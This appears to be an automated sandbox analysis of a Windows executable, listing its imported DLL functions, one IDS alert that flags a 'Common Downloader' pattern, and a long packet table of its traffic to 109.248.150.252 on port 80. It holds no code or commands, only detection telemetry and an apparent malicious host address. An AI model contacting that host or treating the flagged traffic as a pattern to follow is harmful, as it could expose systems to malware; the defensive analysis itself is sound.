                                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-04T09:23:15.283334+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749946109.248.150.25280TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 4, 2024 09:23:13.873097897 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:13.992978096 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:13.993149042 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:13.994492054 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:14.114362955 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283227921 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283334017 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.283368111 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283380985 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283456087 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.283456087 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.283873081 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283886909 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.283941031 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.363658905 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.363745928 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.363835096 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.363848925 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.363898039 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.364291906 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.364340067 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.403525114 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.403594971 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.403640032 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.403662920 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.407547951 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.407645941 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.407660007 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.407711983 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.484426022 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.484518051 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.484548092 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.484595060 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.488647938 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.488703012 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.488770008 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.488955975 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.497108936 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.497162104 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.497236013 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.497284889 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.505467892 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.505537033 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.505570889 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.505621910 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.513936043 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.513992071 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.514122963 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.514173031 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.565110922 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.565181017 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.565217018 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.565265894 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.569084883 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.569140911 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.569195986 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.569405079 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.576997042 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.577076912 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.577095032 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.577328920 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.584849119 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.584945917 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.584971905 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.586144924 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.592802048 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.592900038 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.592920065 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.593161106 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.600749969 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.600828886 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.600874901 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.600918055 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.608637094 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.608705997 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.608777046 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.608963013 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.616475105 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.616574049 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.685478926 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.685534000 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.685611010 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.685760021 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.689201117 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.689248085 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.690623045 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.690684080 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.690764904 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.690916061 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.698120117 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.698234081 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.698276043 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.698412895 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.705630064 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.705672026 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.705770016 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.705816984 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.713174105 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.713243008 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.713326931 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.713396072 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.720649958 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.720700979 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.720798969 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.720844030 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.727891922 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.727933884 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.728030920 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.728137970 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.734363079 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.734421015 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.734477043 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.734519005 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.740895033 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.740945101 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.741039038 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.741080046 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.746957064 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.747011900 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.766176939 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.766230106 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.766278028 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.766324043 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.768088102 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.768148899 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.768274069 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.768320084 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.771836042 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.771888018 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.773227930 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.773277044 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.773317099 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.773360968 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.777005911 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.777056932 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.777193069 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.777245045 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.780797958 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.780872107 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.780941963 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.780992031 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.784554958 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.784603119 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.784665108 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.784707069 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.788382053 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.788429976 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.788530111 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.788573980 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.792157888 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.792202950 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.792243958 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.792289972 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.795890093 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.795933008 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.796032906 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.796075106 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.799755096 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.799806118 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.799881935 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.799926043 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.803549051 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.803596973 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.803709030 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.803750038 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.807363987 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.807405949 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.902390003 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.902439117 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.902483940 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.902538061 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.904268026 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.904316902 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.904400110 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.904450893 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.908118963 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.908169031 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.908247948 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.908289909 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.911751986 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.911799908 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.911910057 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.911952019 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.915415049 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.915463924 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.915543079 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.915585041 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.919025898 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.919068098 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.919156075 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.919197083 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.922431946 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.922476053 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.922540903 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.922576904 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.925787926 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.925848007 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.925929070 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.925968885 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.929009914 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.929053068 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.929121971 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.929162979 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.932091951 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.932132006 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.932224035 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.932265997 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.935156107 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.935201883 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.935262918 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.935298920 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.938355923 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.938405991 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.938481092 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.938519955 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.941226006 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.941266060 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.941407919 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.941468000 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.944319963 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.944361925 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.944456100 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.944493055 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.947305918 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.947348118 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:15.947381973 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:15.947416067 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.003950119 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.004033089 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.004080057 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.004126072 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.005443096 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.005486965 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.005564928 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.005604029 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.010890007 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.010904074 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.010946989 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.013020039 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.013066053 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.013155937 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.013202906 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.015254974 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.015307903 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.015397072 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.015449047 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.017606020 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.017652035 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.017738104 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.017781019 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.020673990 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.020716906 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.020781994 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.020823002 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.023834944 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.023876905 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.024054050 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.024100065 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.026746988 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.026806116 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.026869059 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.026913881 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.029757977 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.029808998 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.029885054 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.030042887 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.032778025 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.032845974 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.032912016 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.032954931 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.035789967 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.035851002 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.035947084 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.035996914 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.038892031 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.038947105 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.039017916 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.039064884 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.041914940 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.041990042 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.042069912 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.042118073 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.044961929 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.045011044 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.045068979 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.045114994 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.047996998 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.048048019 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.048118114 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.048162937 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.050996065 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.051047087 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.051129103 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.051172972 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.053993940 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.054044008 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.054160118 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.054208040 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.057126999 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.057179928 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.057332039 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.057375908 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.060127020 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.060182095 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.060275078 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.060319901 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.063143969 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.063205957 CET4994680192.168.2.7109.248.150.252
                                                Dec 4, 2024 09:23:16.063277960 CET8049946109.248.150.252192.168.2.7
                                                Dec 4, 2024 09:23:16.063330889 CET4994680192.168.2.7109.248.150.252
